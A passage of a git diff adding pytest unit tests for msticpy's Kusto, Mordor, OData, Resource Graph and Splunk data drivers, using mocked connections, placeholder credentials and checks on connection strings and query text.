+    with custom_mp_config(msticpy_config):
+        return QueryProvider("Kusto", query_paths=[qry_path])
+
+
+_TEST_CON_STR = [
+    "azure_data-Explorer://",
+    "tenant='69d28fd7-42a5-48bc-a619-af56397b9f28';",
+    "clientid='69d28fd7-42a5-48bc-a619-af56397b1111';",
+    "clientsecret='[PLACEHOLDER]';",
+    "cluster='https://msticapp.kusto.windows.net';",
+    "database='scrubbeddata'",
+]
+_KUSTO_TESTS = [
+    ("no_params", {}),
+    ("cluster_uri", {"cluster": "https://msticapp.kusto.windows.net"}),
+    ("cluster", {"cluster": "msticapp"}),
+    ("database", {"database": "scrubbeddata"}),
+    (
+        "both",
+        {
+            "cluster": "https://msticapp.kusto.windows.net",
+            "database": "scrubbeddata",
+        },
+    ),
+    ("con_str", {"connection_str": "".join(_TEST_CON_STR)}),
+]
+
+
+def _mock_connect(self, *args, **kwargs):
+    """Mock connect for KqlDriver"""
+    print(args, kwargs)
+
+
+@pytest.mark.parametrize("inst, qry_args", _KUSTO_TESTS)
+def test_kusto_driver_connect(inst, qry_args, monkeypatch, kusto_qry_prov):
+    """Test class Kusto load and execute query driver."""
+    qry_prov = kusto_qry_prov
+    driver = qry_prov._query_provider
+    check.is_instance(driver, KustoDriver)
+    check.greater_equal(len(qry_prov.list_queries()), 4)
+
+    print(inst)
+    # set up mock
+    mock_driver = Mock(KqlDriver)
+    mock_driver.connect.return_value = None
+    monkeypatch.setattr(driver.__class__.__mro__[1], "connect", _mock_connect)
+
+    # Call connect
+    driver.connect(**qry_args)
+    if inst in ("both", "con_str"):
+        # We expect successful connection with either both cluster
+        # and database params or full connection string
+        check.is_not_none(driver.current_connection)
+        for expected in _TEST_CON_STR:
+            check.is_in(expected, driver.current_connection)
+    else:
+        check.is_none(driver.current_connection)
+
+
+@pytest.mark.parametrize("inst, qry_args", _KUSTO_TESTS)
+def test_kusto_driver_queries(inst, qry_args, monkeypatch, kusto_qry_prov):
+    """Test class Kusto load and execute query driver."""
+    qry_prov = kusto_qry_prov
+    driver = qry_prov._query_provider
+    check.is_instance(driver, KustoDriver)
+    check.greater_equal(len(qry_prov.list_queries()), 4)
+
+    print(inst)
+    # set up mock
+    mock_driver = Mock(KqlDriver)
+    mock_driver.query_with_results.return_value = "data", "success"
+    monkeypatch.setattr(driver, "query_with_results", mock_driver.query_with_results)
+
+    # Run query
+    result = qry_prov.AppAuthCluster.scrubbeddata.list_host_processes(
+        host_name="test", **qry_args
+    )
+    mock_qry_func = driver.query_with_results
+    mock_qry_func.assert_called_once()
+    check.equal(result, "data")
+    check.is_in('DeviceName has "test"', mock_qry_func.call_args[0][0])
+    check.is_in("where Timestamp >= datetime(2", mock_qry_func.call_args[0][0])
+    for expected in _TEST_CON_STR:
+        check.is_in(expected, driver.current_connection)
+
+
+_TEST_CON_STR_INTEG = [
+    "azure_data-Explorer://",
+    "code;",
+    "cluster='https://mstic.kusto.windows.net';",
+    "database='scrubbeddata'",
+]
+_KUSTO_TESTS_INTEG = [
+    ("no_params", {}),
+    ("cluster_uri", {"cluster": "https://mstic.kusto.windows.net"}),
+    ("cluster", {"cluster": "mstic"}),
+    ("database", {"database": "scrubbeddata"}),
+    (
+        "both",
+        {
+            "cluster": "https://mstic.kusto.windows.net",
+            "database": "scrubbeddata",
+        },
+    ),
+    ("con_str", {"connection_str": "".join(_TEST_CON_STR_INTEG)}),
+]
+
+
+@pytest.mark.parametrize("inst, qry_args", _KUSTO_TESTS_INTEG)
+def test_kusto_driver_integ_auth(inst, qry_args, monkeypatch, kusto_qry_prov):
+    """Test class Kusto load and execute query driver."""
+    qry_prov = kusto_qry_prov
+    driver = qry_prov._query_provider
+    check.is_instance(driver, KustoDriver)
+    check.greater_equal(len(qry_prov.list_queries()), 4)
+
+    print(inst)
+    # set up mock
+    mock_driver = Mock(KqlDriver)
+    mock_driver.query_with_results.return_value = "data", "success"
+    monkeypatch.setattr(driver, "query_with_results", mock_driver.query_with_results)
+
+    # Run query
+    result = qry_prov.IntegAuthCluster.scrubbeddata.list_host_processes(
+        host_name="test", **qry_args
+    )
+    mock_qry_func = driver.query_with_results
+    mock_qry_func.assert_called_once()
+    check.equal(result, "data")
+    check.is_in('DeviceName has "test"', mock_qry_func.call_args[0][0])
+    check.is_in("where Timestamp >= datetime(2", mock_qry_func.call_args[0][0])
+    for expected in _TEST_CON_STR_INTEG:
+        check.is_in(expected, driver.current_connection)
+
+
+@pytest.mark.parametrize("inst, qry_args", _KUSTO_TESTS)
+def test_kusto_driver_params_fail(inst, qry_args, monkeypatch):
+    """Test with parameters but missing config."""
+    qry_path = str(get_test_data_path().joinpath("kusto"))
+    msticpy_config = get_test_data_path().joinpath("msticpyconfig-nokusto.yaml")
+    with custom_mp_config(msticpy_config):
+        qry_prov = QueryProvider("Kusto", query_paths=[qry_path])
+    driver = qry_prov._query_provider
+
+    print(inst)
+    # set up mock
+    mock_driver = Mock(KqlDriver)
+    mock_driver.query_with_results.return_value = "data", "success"
+    monkeypatch.setattr(driver, "query_with_results", mock_driver.query_with_results)
+
+    if inst == "con_str":
+        # No configuration so only supplying full connection string should work
+        result = qry_prov.AppAuthCluster.scrubbeddata.list_host_processes(
+            host_name="test", **qry_args
+        )
+        mock_qry_func = driver.query_with_results
+        mock_qry_func.assert_called_once()
+        check.equal(result, "data")
+        check.is_in('DeviceName has "test"', mock_qry_func.call_args[0][0])
+        check.is_in("where Timestamp >= datetime(2", mock_qry_func.call_args[0][0])
+        for expected in _TEST_CON_STR:
+            check.is_in(expected, driver.current_connection)
+    else:
+        # Everything else should throw a configuration error.
+        with pytest.raises(MsticpyUserConfigError):
+            result = qry_prov.AppAuthCluster.scrubbeddata.list_host_processes(
+                host_name="test", **qry_args
+            )
+
+
+@pytest.mark.parametrize("inst, qry_args", _KUSTO_TESTS)
+def test_kusto_driver_query_fail(inst, qry_args, monkeypatch, kusto_qry_prov):
+    """Test with queries + params with incomplete metadata."""
+    qry_prov = kusto_qry_prov
+    driver = qry_prov._query_provider
+    check.is_instance(driver, KustoDriver)
+    check.greater_equal(len(qry_prov.list_queries()), 4)
+
+    check.is_true(hasattr(qry_prov.AppAuthClustera.scrubbeddata, "query_new_alias"))
+    check.is_true(hasattr(qry_prov.scrubbeddata, "bad_query_fam_no_dot"))
+    print(inst)
+    # set up mock
+    mock_driver = Mock(KqlDriver)
+    mock_driver.query_with_results.return_value = "data", "success"
+    monkeypatch.setattr(driver, "query_with_results", mock_driver.query_with_results)
+
+    if inst in ("both", "cluster", "con_str", "cluster_uri"):
+        # run query
+        result = qry_prov.AppAuthCluster.scrubbeddata.bad_query_no_cluster(
+            cmd_line="test", **qry_args
+        )
+        mock_qry_func = driver.query_with_results
+        mock_qry_func.assert_called_once()
+        check.equal(result, "data")
+        check.is_in('ProcessCommandLine contains "test"', mock_qry_func.call_args[0][0])
+        check.is_in("where Timestamp >= datetime(2", mock_qry_func.call_args[0][0])
+        for expected in _TEST_CON_STR:
+            check.is_in(expected, driver.current_connection)
+    else:
+        # Everything else should throw a parameter error.
+        with pytest.raises(MsticpyParameterError):
+            qry_prov.AppAuthCluster.scrubbeddata.bad_query_no_cluster(
+                cmd_line="test", **qry_args
+            )
diff --git a/tests/data/drivers/test_mordor_driver.py b/tests/data/drivers/test_mordor_driver.py
new file mode 100644
index 000000000..24607ef89
--- /dev/null
+++ b/tests/data/drivers/test_mordor_driver.py
@@ -0,0 +1,204 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mordor data driver test."""
+import contextlib
+import io
+import json
+import os
+import shutil
+from datetime import datetime
+from pathlib import Path
+from unittest.mock import patch
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.data import QueryProvider
+from msticpy.data.drivers.mordor_driver import (
+    _MITRE_TACTICS_CACHE,
+    _MITRE_TECH_CACHE,
+    _MORDOR_CACHE,
+    MordorDriver,
+    MordorEntry,
+    download_mdr_file,
+    search_mdr_data,
+)
+
+from ...unit_test_lib import get_test_data_path
+
+__author__ = "Ian Hellen"
+
+_SAVE_FOLDER = "mordor_test"
+
+
+# pylint: disable=redefined-outer-name, protected-access, global-statement
+
+
+@pytest.fixture(scope="session")
+def save_folder(tmp_path_factory):
+    """Query Provider fixture."""
+    cache_folder = tmp_path_factory.mktemp(_SAVE_FOLDER)
+    for file in get_test_data_path().joinpath("mordor").glob("*.pkl"):
+        shutil.copy(str(file), str(cache_folder))
+    shutil.copy(
+        str(get_test_data_path().joinpath("mordor").joinpath("mordor_cache.json")),
+        str(cache_folder),
+    )
+    mordor_cache_file = Path(cache_folder).joinpath("mordor_cache.json")
+    mdr_cache = json.loads(mordor_cache_file.read_text(encoding="utf-8"))
+    for item in mdr_cache.values():
+        item["mp_last_updated"] = pd.Timestamp.utcnow().isoformat()
+    Path(mordor_cache_file).write_text(
+        json.dumps(mdr_cache, indent=4), encoding="utf-8"
+    )
+
+    return str(cache_folder)
+
+
+def get_mdr_data_paths(save_folder):
+    """Mock get_mdr_data_paths."""
+    mdr_cache = json.loads(
+        Path(save_folder).joinpath("mordor_cache.json").read_text(encoding="utf-8")
+    )
+    return list(mdr_cache.keys())
+
+
+@pytest.fixture
+@patch("msticpy.data.drivers.mordor_driver.get_mdr_data_paths")
+def qry_provider(get_paths, save_folder):
+    """Query Provider fixture."""
+    get_paths.return_value = get_mdr_data_paths(save_folder)
+    qry_prov = QueryProvider("Mordor", save_folder=save_folder)
+    qry_prov.connect()
+    return qry_prov
+
+
+@pytest.fixture
+def mdr_driver(qry_provider):
+    """Test fixture to create mordor driver."""
+    return qry_provider._query_provider
+
+
+def test_mordor_load(mdr_driver: MordorDriver):
+    """Check basic load of driver."""
+    check.is_true(mdr_driver.loaded)
+    check.is_true(mdr_driver.connected)
+    check.is_false(mdr_driver.use_query_paths)
+    check.is_true(mdr_driver.has_driver_queries)
+
+    check.is_instance(mdr_driver.mitre_techniques, pd.DataFrame)
+    check.is_instance(mdr_driver.mitre_tactics, pd.DataFrame)
+    check.is_in("T1078", mdr_driver.mitre_techniques.index)
+    check.is_in("TA0001", mdr_driver.mitre_tactics.index)
+
+    check.is_true(len(mdr_driver.mordor_data) > 50)
+
+    _, first_item = next(iter(mdr_driver.mordor_data.items()))
+    check.is_instance(first_item.title, str)
+    check.is_instance(first_item.id, str)
+    check.is_instance(first_item.contributors, list)
+    check.is_instance(first_item.creation_date, datetime)
+    check.is_instance(first_item.files, list)
+    check.is_true(len(first_item.files) > 0)
+    check.is_instance(first_item.attack_mappings, list)
+    for attack in first_item.attack_mappings:
+        check.is_in("technique", attack)
+        check.is_in("tactics", attack)
+
+
+def test_mordor_cache(save_folder, qry_provider):
+    """Test to see if connecting has created valid cache files."""
+    del qry_provider
+    tactics_cache = Path(save_folder).joinpath(_MITRE_TACTICS_CACHE)
+    tech_cache = Path(save_folder).joinpath(_MITRE_TECH_CACHE)
+    mordor_cache = Path(save_folder).joinpath(_MORDOR_CACHE)
+
+    check.is_true(tactics_cache.is_file())
+    check.is_true(tech_cache.is_file())
+    check.is_true(mordor_cache.is_file())
+
+    tactics_df = pd.read_pickle(tactics_cache)
+    check.is_instance(tactics_df, pd.DataFrame)
+    check.greater_equal(len(tactics_df), 10)
+    techniques_df = pd.read_pickle(tech_cache)
+    check.is_instance(techniques_df, pd.DataFrame)
+    check.greater_equal(len(techniques_df), 50)
+
+    json_text = Path(mordor_cache).read_text(encoding="utf-8")
+    md_metadata = json.loads(json_text)
+    check.is_instance(md_metadata, dict)
+    item = next(iter(md_metadata.values()))
+    check.is_instance(item, dict)
+    mdr_entry_dict = item.copy()
+    mdr_entry_dict.pop("mp_last_updated")
+    mordor_entry = MordorEntry(**mdr_entry_dict)
+    check.is_instance(mordor_entry, MordorEntry)
+
+
+def test_mordor_search(mdr_driver: MordorDriver):
+    """Test search functionality."""
+    results = search_mdr_data(mdr_driver.mordor_data, "AWS")
+    check.greater_equal(len(results), 1)
+
+    subset = search_mdr_data(mdr_driver.mordor_data, "Empire")
+    check.greater_equal(len(subset), 39)
+
+    emp_power = search_mdr_data(mdr_driver.mordor_data, "Empire+Power")
+    check.greater_equal(len(emp_power), 18)
+    check.greater_equal(
+        len(search_mdr_data(mdr_driver.mordor_data, "Empire, Windows")), 50
+    )
+
+    subset_search = search_mdr_data(mdr_driver.mordor_data, "Power", subset=subset)
+    check.equal(len(emp_power), len(subset_search))
+
+    result_set = mdr_driver.search_queries("AWS")
+    check.greater_equal(len(list(result_set)), 1)
+    check.is_true(any(hit for hit in result_set if "atomic.aws.collection" in hit))
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+def test_mordor_download(mdr_driver: MordorDriver, save_folder):
+    """Test file download."""
+    entry = next(iter(mdr_driver.mordor_data.values()))
+    files = entry.get_file_paths()
+
+    file_path = files[0]["file_path"]
+    d_frame = download_mdr_file(file_path, save_folder=save_folder)
+
+    check.is_instance(d_frame, pd.DataFrame)
+    check.greater_equal(len(d_frame), 10)
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+def test_mordor_query_provider(qry_provider):
+    """Test query functions from query provider."""
+    queries = qry_provider.list_queries()
+    check.greater_equal(len(queries), 50)
+
+    check.is_true(hasattr(qry_provider, "atomic"))
+    check.is_true(hasattr(qry_provider, queries[0]))
+
+    test_query = "atomic.windows.credential_access.host.empire_mimikatz_logonpasswords"
+    q_func = getattr(qry_provider, test_query)
+    output = io.StringIO()
+    with contextlib.redirect_stdout(output):
+        q_func("?")
+    check.is_in("Query:", output.getvalue())
+    check.is_in("Data source:  Mordor", output.getvalue())
+    check.is_in("Mordor ID:", output.getvalue())
+    check.is_in("Mitre Techniques:", output.getvalue())
+
+    f_path = q_func("print")
+    check.is_in("https://raw.githubusercontent.com/OTRF/Security-Datasets", f_path)
+
+    d_frame = q_func()
+    check.is_instance(d_frame, pd.DataFrame)
+    check.greater_equal(len(d_frame), 10)
diff --git a/tests/data/drivers/test_odata_drivers.py b/tests/data/drivers/test_odata_drivers.py
new file mode 100644
index 000000000..952c58a19
--- /dev/null
+++ b/tests/data/drivers/test_odata_drivers.py
@@ -0,0 +1,196 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Miscellaneous data provider driver tests."""
+from unittest.mock import patch
+from unittest.mock import Mock
+
+import pytest
+import pytest_check as check
+
+from msticpy.data import DataEnvironment, QueryProvider
+from msticpy.data.drivers import import_driver
+
+from msticpy.data.drivers.mdatp_driver import MDATPDriver
+from msticpy.data.drivers.security_graph_driver import SecurityGraphDriver
+
+from ...unit_test_lib import get_test_data_path, custom_mp_config
+
+_RGE_IMP_OK = False
+try:
+    from msticpy.data.drivers.resource_graph_driver import ResourceGraphDriver
+
+    _RGE_IMP_OK = True
+except ImportError:
+    pass
+
+
+MP_PATH = str(get_test_data_path().parent.joinpath("msticpyconfig-test.yaml"))
+# pylint: disable=protected-access
+
+
+_JSON_RESP = {
+    "token_type": "Bearer",
+    "expires_in": "3599",
+    "ext_expires_in": "3599",
+    "expires_on": "1582155956",
+    "not_before": "1582152056",
+    "resource": "https://api.securitycenter.windows.com",
+    "access_token": None,
+}
+
+_MDEF_TESTS = [
+    ("MDE", "https://api.securitycenter.microsoft.com/"),
+    ("MDATP", "https://api.securitycenter.microsoft.com/"),
+    ("M365D", "https://api.security.microsoft.com/"),
+]
+
+
+@pytest.mark.parametrize("env, api", _MDEF_TESTS)
+def test_MDE_driver(env, api):
+    """Test class MDE driver."""
+    env_enum = DataEnvironment.parse(env)
+    driver_cls = import_driver(env_enum)
+    with custom_mp_config(MP_PATH):
+        driver = driver_cls(data_environment=env_enum)
+    check.is_instance(driver, MDATPDriver)
+    check.equal(driver.api_root, api)
+
+    with custom_mp_config(MP_PATH):
+        qry_prov = QueryProvider(env)
+    driver = qry_prov._query_provider
+    check.is_instance(driver, MDATPDriver)
+    check.greater_equal(len(qry_prov.list_queries()), 40)
+
+
+# Test helper functions for MDE tests
+def _mde_pre_checks(mde_drv, api):
+    check.is_instance(mde_drv, MDATPDriver)
+    check.is_false(mde_drv.connected)
+    check.equal(mde_drv.api_root, f"https://api.{api}.microsoft.com/")
+
+
+def _mde_post_checks(mde_drv, api, httpx):
+    check.equal(mde_drv.aad_token, _AUTH_RESP["access_token"])
+    httpx.post.assert_called_once()
+    check.equal(
+        httpx.post.call_args[1]["url"],
+        "https://login.microsoftonline.com/8360dd21-0294-4240-9128-89611f415c53/oauth2/token",
+    )
+    check.is_instance(
+        httpx.post.call_args[1]["content"],
+        bytes,
+    )
+    check.equal(mde_drv.request_uri, f"https://api.{api}.microsoft.com/api")
+
+
+def _mde_create_mock(httpx):
+    response = Mock()
+    response.json.return_value = _AUTH_RESP.copy()
+    httpx.post.return_value = response
+
+
+@pytest.mark.parametrize(
+    "env, api",
+    [("MDATP", "securitycenter"), ("MDE", "securitycenter"), ("M365D", "security")],
+)
+@patch("msticpy.data.drivers.odata_driver.httpx")
+def test_mde_connect(httpx, env, api):
+    """Test security graph driver."""
+    driver_cls = import_driver(DataEnvironment.parse(env))
+    with custom_mp_config(MP_PATH):
+        mde_drv = driver_cls(data_environment=DataEnvironment.parse(env))
+    _mde_pre_checks(mde_drv=mde_drv, api=api)
+    _mde_create_mock(httpx)
+    with custom_mp_config(MP_PATH):
+        mde_drv.connect()
+    _mde_post_checks(mde_drv, api, httpx)
+
+
+_CONSTRING = "client_id=1234;tenant_id=8360dd21-0294-4240-9128-89611f415c53;client_secret=[PLACEHOLDER]"
+_MDE_CONNECT_STR = [
+    ("MDATP", "securitycenter", _CONSTRING),
+    ("MDE", "securitycenter", _CONSTRING),
+    ("M365D", "security", _CONSTRING),
+]
+
+
+@pytest.mark.parametrize("env, api, con_str", _MDE_CONNECT_STR)
+@patch("msticpy.data.drivers.odata_driver.httpx")
+def test_mde_connect_str(httpx, env, api, con_str):
+    """Test security graph driver."""
+    driver_cls = import_driver(DataEnvironment.parse(env))
+    with custom_mp_config(MP_PATH):
+        mde_drv = driver_cls(data_environment=DataEnvironment.parse(env))
+    _mde_pre_checks(mde_drv=mde_drv, api=api)
+    _mde_create_mock(httpx)
+    with custom_mp_config(MP_PATH):
+        mde_drv.connect(con_str)
+    _mde_post_checks(mde_drv, api, httpx)
+
+
+_PARAMS = {
+    "client_id": "1234",
+    "tenant_id": "8360dd21-0294-4240-9128-89611f415c53",
+    "client_secret": "[PLACEHOLDER]",
+}
+_MDE_CONNECT_PARAMS = [
+    ("MDATP", "securitycenter", _PARAMS),
+    ("MDE", "securitycenter", _PARAMS),
+    ("M365D", "security", _PARAMS),
+]
+
+
+@pytest.mark.parametrize("env, api, params", _MDE_CONNECT_PARAMS)
+@patch("msticpy.data.drivers.odata_driver.httpx")
+def test_mde_connect_params(httpx, env, api, params):
+    """Test security graph driver."""
+    driver_cls = import_driver(DataEnvironment.parse(env))
+    with custom_mp_config(MP_PATH):
+        mde_drv = driver_cls(data_environment=DataEnvironment.parse(env))
+    _mde_pre_checks(mde_drv=mde_drv, api=api)
+    _mde_create_mock(httpx)
+    with custom_mp_config(MP_PATH):
+        mde_drv.connect(**params)
+    _mde_post_checks(mde_drv, api, httpx)
+
+
+_AUTH_RESP = {"access_token": "123456789"}
+
+
+@patch("msticpy.data.drivers.odata_driver.httpx")
+def test_security_graph_connect(httpx):
+    """Test security graph driver."""
+    driver_cls = import_driver(DataEnvironment.SecurityGraph)
+    with custom_mp_config(MP_PATH):
+        sec_graph = driver_cls()
+    assert isinstance(sec_graph, SecurityGraphDriver)
+    check.is_false(sec_graph.connected)
+    check.equal(sec_graph.api_root, "https://graph.microsoft.com/")
+
+    response = Mock()
+    response.json.return_value = _AUTH_RESP.copy()
+    httpx.post.return_value = response
+    with custom_mp_config(MP_PATH):
+        sec_graph.connect()
+    check.equal(sec_graph.aad_token, _AUTH_RESP["access_token"])
+    httpx.post.assert_called_once()
+    check.equal(
+        httpx.post.call_args[1]["url"],
+        "https://login.microsoftonline.com/8360dd21-0294-4240-9128-89611f415c53/oauth2/v2.0/token",
+    )
+    check.is_instance(
+        httpx.post.call_args[1]["content"],
+        bytes,
+    )
+    check.equal(sec_graph.request_uri, "https://graph.microsoft.com/v1.0")
+
+
+@pytest.mark.skipif(not _RGE_IMP_OK, reason="Partial msticpy install")
+def test_ResourceGraph():
+    """Test resource graph driver."""
+    driver_cls = import_driver(DataEnvironment.ResourceGraph)
+    resource_graph = driver_cls()
+    assert isinstance(resource_graph, ResourceGraphDriver)
diff --git a/tests/data/drivers/test_resource_graph_driver.py b/tests/data/drivers/test_resource_graph_driver.py
new file mode 100644
index 000000000..c609adca3
--- /dev/null
+++ b/tests/data/drivers/test_resource_graph_driver.py
@@ -0,0 +1,117 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+from collections import namedtuple
+from unittest.mock import patch
+
+import pandas as pd
+import pytest
+
+from azure.identity import InteractiveBrowserCredential
+
+from msticpy.common.azure_auth_core import (
+    ChainedTokenCredential,
+    CredentialWrapper,
+    AzCredentials,
+)
+from msticpy.data.drivers.resource_graph_driver import ResourceGraphDriver
+
+# pylint: disable=redefined-outer-name
+
+
+class _MockSub:
+    """Mock of Subscription Class."""
+
+    def list(self):
+        """Provide list of subscriptions."""
+        SubDets = namedtuple("SubDetails", ["subscription_id", "name"])
+        return [SubDets("123", "sub1")]
+
+
+class _MockSubClient:
+    """Mock of SubscriptionClient."""
+
+    def __init__(self):
+        self.subscriptions = _MockSub()
+
+
+class _MockResourceGraphClient:
+    """Mock of ResourceGraphClient."""
+
+    def resources(self, query):
+        """Mock response to query."""
+        del query
+        return _MockResponse()
+
+
+class _MockResponse:
+    """Mocked response object."""
+
+    def __init__(self):
+        self.result_truncated = False
+        self.data = [
+            {
+                "id": "/subscriptions/123/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/vm1",
+                "name": "vm1",
+                "type": "microsoft.compute/virtualmachines",
+                "tenantId": "123",
+                "kind": "",
+                "location": "westeurope",
+                "resourceGroup": "rg",
+                "subscriptionId": "123",
+            },
+            {
+                "id": "/subscriptions/123/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/vm2",
+                "name": "vm2",
+                "type": "microsoft.compute/virtualmachines",
+                "tenantId": "123",
+                "kind": "",
+                "location": "westeurope",
+                "resourceGroup": "rg",
+                "subscriptionId": "123",
+            },
+            {
+                "id": "/subscriptions/123/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/vm3",
+                "name": "vm3",
+                "type": "microsoft.compute/virtualmachines",
+                "tenantId": "123",
+                "kind": "",
+                "location": "westeurope",
+                "resourceGroup": "rg",
+                "subscriptionId": "123",
+            },
+        ]
+
+
+_AZ_CREDENTIALS = AzCredentials(
+    legacy=CredentialWrapper("credential"),
+    modern=ChainedTokenCredential(InteractiveBrowserCredential()),
+)
+
+
+@pytest.fixture(scope="module")
+@patch(ResourceGraphDriver.__module__ + ".SubscriptionClient")
+@patch(ResourceGraphDriver.__module__ + ".az_connect")
+@patch(ResourceGraphDriver.__module__ + ".ResourceGraphClient")
+def rgd(mock_res_client, mock_creds, mock_sub_client):
+    """Pytest fixture to create ResourceGraphDriver for other tests."""
+    mock_sub_client.return_value = _MockSubClient()
+    mock_creds.return_value = _AZ_CREDENTIALS
+    mock_res_client.return_value = _MockResourceGraphClient()
+    rgd = ResourceGraphDriver()
+    rgd.connect()
+    return rgd
+
+
+def test_connect(rgd):
+    """Test connection protocol has worked."""
+    assert rgd.connected is True
+
+
+def test_query(rgd):
+    """Test query calling returns data in expected format."""
+    data = rgd.query("test")
+    assert isinstance(data, pd.DataFrame)
+    assert data.iloc[0]["name"] == "vm1"
diff --git a/tests/data/drivers/test_splunk_driver.py b/tests/data/drivers/test_splunk_driver.py
new file mode 100644
index 000000000..78f2695d8
--- /dev/null
+++ b/tests/data/drivers/test_splunk_driver.py
@@ -0,0 +1,294 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""datq query test class."""
+import io
+
+from unittest.mock import patch, MagicMock
+import pytest
+import pytest_check as check
+
+import pandas as pd
+
+from msticpy.common.exceptions import (
+    MsticpyUserConfigError,
+    MsticpyConnectionError,
+    MsticpyNotConnectedError,
+)
+
+from msticpy.data.drivers.splunk_driver import SplunkDriver, sp_client
+
+from ...unit_test_lib import get_test_data_path
+
+_TEST_DATA = get_test_data_path()
+
+SPLUNK_CLI_PATCH = SplunkDriver.__module__ + ".sp_client"
+SPLUNK_RESULTS_PATCH = SplunkDriver.__module__ + ".sp_results"
+
+
+# pylint: disable=too-many-branches, too-many-return-statements
+# pylint: disable=no-self-use, too-few-public-methods, protected-access
+
+
+def cli_connect(**kwargs):
+    """Return None if magic isn't == kql."""
+    cause = MagicMock()
+    cause.body = bytes("Test body stuff", encoding="utf-8")
+    cause.status = 404
+    cause.reason = "Page not found."
+    cause.headers = "One Two Three"
+    if kwargs.get("host") == "AuthError":
+        raise sp_client.AuthenticationError(cause=cause, message="test AuthHeader")
+    if kwargs.get("host") == "HTTPError":
+        cause.body = io.BytesIO(cause.body)
+        raise sp_client.HTTPError(response=cause, _message="test HTTPError")
+    return _MockSplunkService()
+
+
+class _MockSplunkSearch:
+    def __init__(self, name, search):
+        self.name = name
+        self.search = search
+
+    def get(self, arg):
+        """Mock method."""
+        del arg
+        return self.search
+
+    def __getitem__(self, key):
+        """Mock method."""
+        if key == "search":
+            return self.search
+        return "other"
+
+
+class _MockAlert:
+    def __init__(self, name, count):
+        self.name = name
+        self.count = count
+
+
+class _MockSplunkService(MagicMock):
+    """Splunk service mock."""
+
+    def __init__(self):
+        """Mock method."""
+        super().__init__()
+        self.searches = [
+            _MockSplunkSearch("query1", "get stuff from somewhere"),
+            _MockSplunkSearch("query2", "get stuff from somewhere"),
+        ]
+        self.jobs = MagicMock()
+        self.jobs.oneshot = self._query_response
+
+    @property
+    def saved_searches(self):
+        """Mock method."""
+        return self.searches
+
+    @property
+    def fired_alerts(self):
+        """Mock method."""
+        return [
+            _MockAlert("alert1", 10),
+            _MockAlert("alert2", 10),
+            _MockAlert("alert3", 10),
+            _MockAlert("alert4", 10),
+        ]
+
+    @staticmethod
+    def _query_response(query, **kwargs):
+        del kwargs
+        return query
+
+
+def _results_reader(query_result):
+    """Mock Splunk results reader."""
+    if "zero query" in query_result:
+        yield None
+    else:
+        for i in range(10):
+            yield {"row": i, "query": query_result, "text": f"test text {i}"}
+
+
+_FAKE_STRING = "42424"
+
+
+@patch(SPLUNK_CLI_PATCH)
+def test_splunk_connect_no_params(splunk_client):
+    """Check failure with no args."""
+    splunk_client.connect = cli_connect
+
+    sp_driver = SplunkDriver()
+    check.is_true(sp_driver.loaded)
+
+    with pytest.raises(MsticpyUserConfigError) as mp_ex:
+        sp_driver.connect()
+        check.is_false(sp_driver.connected)
+    check.is_in("no Splunk connection parameters", mp_ex.value.args)
+
+
+@patch(SPLUNK_CLI_PATCH)
+def test_splunk_connect_req_params(splunk_client):
+    """Check load/connect success with required params."""
+    splunk_client.connect = cli_connect
+
+    sp_driver = SplunkDriver()
+    check.is_true(sp_driver.loaded)
+
+    # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+    sp_driver.connect(host="localhost", username="ian", password=_FAKE_STRING)  # nosec
+    check.is_true(sp_driver.connected)
+
+    # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+    sp_cntn_str = (
+        f"host='localhost'; username='ian'; password='{_FAKE_STRING}'"  # nosec
+    )
+    sp_driver = SplunkDriver()
+
+    sp_driver.connect(connection_str=sp_cntn_str)
+
+
+@patch(SPLUNK_CLI_PATCH)
+def test_splunk_connect_errors(splunk_client):
+    """Check connect failure errors."""
+    splunk_client.connect = cli_connect
+
+    sp_driver = SplunkDriver()
+    check.is_true(sp_driver.loaded)
+
+    print("connected", sp_driver.connected)
+    with pytest.raises(MsticpyConnectionError) as mp_ex:
+        # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+        sp_driver.connect(
+            host="AuthError", username="ian", password=_FAKE_STRING
+        )  # nosec
+        print("connected", sp_driver.connected)
+        check.is_false(sp_driver.connected)
+    check.is_in("Splunk connection", mp_ex.value.args)
+
+    sp_driver = SplunkDriver()
+    print("connected", sp_driver.connected)
+    with pytest.raises(MsticpyConnectionError) as mp_ex:
+        # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
+        sp_driver.connect(
+            host="HTTPError", username="ian", password=_FAKE_STRING
+        )  # nosec
+        print("connected", sp_driver.connected)
+        check.is_false(sp_driver.connected)
+    check.is_in("Splunk connection", mp_ex.value.args)
+
+
+@patch(SPLUNK_CLI_PATCH)
+def test_splunk_fired_alerts(splunk_client):
+    """Check fired alerts."""
+    splunk_client.connect = cli_connect
+    sp_driver = SplunkDriver()
+
+    # trying to get these before connecting should throw
+    with pytest.raises(MsticpyNotConnectedError) as mp_ex:
+        sp_driver._get_fired_alerts()
+        check.is_false(sp_driver.connected)
+        check.is_none(sp_driver._fired_alerts)
+    check.is_in("not connected to Splunk.", mp_ex.value.args)
+
+    # [SuppressMessage("Microsoft.Security", "CS002:SecretInNextLine", Justification="Test code")]
